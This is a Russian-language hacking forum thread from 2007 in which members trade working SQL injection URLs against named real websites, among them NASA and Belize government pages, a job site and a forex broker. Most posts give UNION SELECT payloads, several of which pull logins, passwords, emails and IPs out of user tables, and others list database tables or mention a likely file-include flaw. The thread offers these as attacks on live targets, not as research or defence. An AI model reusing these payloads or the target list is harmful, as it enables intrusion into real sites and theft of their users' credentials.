HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.01.2007, 12:34
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от Termin@L  
http://fotokatalog.ru/index.php?pp=25+union+select+1/*&from=50

Incorrect usage of UNION and ORDER BY
ЧТо это?
Там данные из переменной pp подставляются в order by, а данные из переменной from - в limit. Так что ни хрена не получится. Он всегда тебе будет выдавать ошибку, видимо там
Код:
ORDER BY $pp LIMIT $from,25
 
Ответить с цитированием

  #2  
Старый 03.01.2007, 17:09
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

Всех с 2007-мым годом и Скуль на allpeople.ru

http://www.allpeople.ru/chital.php?read=-2+union+select+1,2,3,4,concat(login,char(3),pas),D ATABASE(),7,8,9,10+from+people+where+id=[Нужный вам id]/*
 
Ответить с цитированием

  #3  
Старый 03.01.2007, 20:26
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.belize.gov.bz/doc_center_directory_listings.php?folder_id=-99+union+select+1,2,concat(username,0x3a,password) ,4+from+users+limit+0,1/*
 
Ответить с цитированием

Nasa.gov
  #4  
Старый 04.01.2007, 00:45
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию Nasa.gov

http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-99+union+select+1,2,3,4,5,6,7,8,table_name,10,11,1 2+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

http://ase.arc.nasa.gov/tech/groups/index.php?ta=4&gid=-99'+union+select+1,table_name,3,4,convert('asd'%20 using%20utf8),6,7,8,9+from+INFORMATION_SCHEMA.TABL ES/*

Дальше юзать не стал, некогда =\
 
Ответить с цитированием

  #5  
Старый 05.01.2007, 00:04
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

_http://www.magverlag.com/offshore_news/news.php?page=0&news=-1+UNION+SELECT+null,null,concat(email,char(58),ip) ,null,null,null,null,null,null+from+emails/*
 
Ответить с цитированием

  #6  
Старый 05.01.2007, 00:18
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.rabota.su/voting/stat.php?id=-99+union+select+1,concat(login,0x3a,pwd),3+from+us ers+limit+0,1/*
gl
 
Ответить с цитированием

  #7  
Старый 05.01.2007, 11:51
stegan0s
Новичок
Регистрация: 02.01.2007
Сообщений: 3
Провел на форуме:
16644

Репутация: 15
По умолчанию

Так тут всё серьёзно Вот, с утра нашёл:
MySQL 4.0.18:
Код:
http://news.numizmatik.ru/read.php?news=-2566+union+select+1,2,3,4,5,6,7,8/*
-----
MySQL 4.0.27:
Код:
http://www.jerusalemsummit.org/eng/news.php?news=-102+union+select+1,2,3,4,5,6,7,8,9,10/*
-----
MySQL 4.1.20:
Код:
http://whtt.org/index.php?news=2&id=-1103+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
-----
MySQL 4.0.21:
Код:
http://expodessa.od.ua/conference/site.php/news?id=-1+union+select+1,2,3/*
-----
MySQL 4.1.21:
Код:
http://www.falungonginfo.net/display.php?news=-1+union+select+1,2,3,4,5,6/*
-----
MySQL ------
Код:
http://www.simpleinvoices.org/index.php?news=-1+union+select+1,2,3,4,5/*
-----
 
Ответить с цитированием

  #8  
Старый 05.01.2007, 19:11
stegan0s
Новичок
Регистрация: 02.01.2007
Сообщений: 3
Провел на форуме:
16644

Репутация: 15
По умолчанию

Сегодня делать определённо нечего
MySQL 4.0.20a:
Код:
http://www.apahelpcenter.org/featuredtopics/feature.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
-----
MySQL 5.0.24a:
Код:
http://www.ipecac.com/bio.php?id=-1+union+select+1,2,3,4/*
-----
MySQL -------
Код:
http://www.keckobservatory.org/article.php?id=-87+union+select+1,2,3,4,5,6,7,8/*
-----
 
Ответить с цитированием

  #9  
Старый 06.01.2007, 20:20
stegan0s
Новичок
Регистрация: 02.01.2007
Сообщений: 3
Провел на форуме:
16644

Репутация: 15
По умолчанию

MySQL ------
Код:
http://www.virtualworldlets.net/Archive/IndividualNews.php?News=-1047+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
-----
MySQL 4.0.25:
Код:
http://www.fitness.ru/clubs/timetable.phtml?ClubID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
-----
 
Ответить с цитированием

  #10  
Старый 06.01.2007, 20:56
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.liteforex.net/index.php?page=tools.php&cat=-99+union+select+1,username,3,4,5,6,7,8,9+from+phpb b_users/*
и т.д.
+там в параметре 'page' вроде бы инклуд .) - но я не стал заморачиваться
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ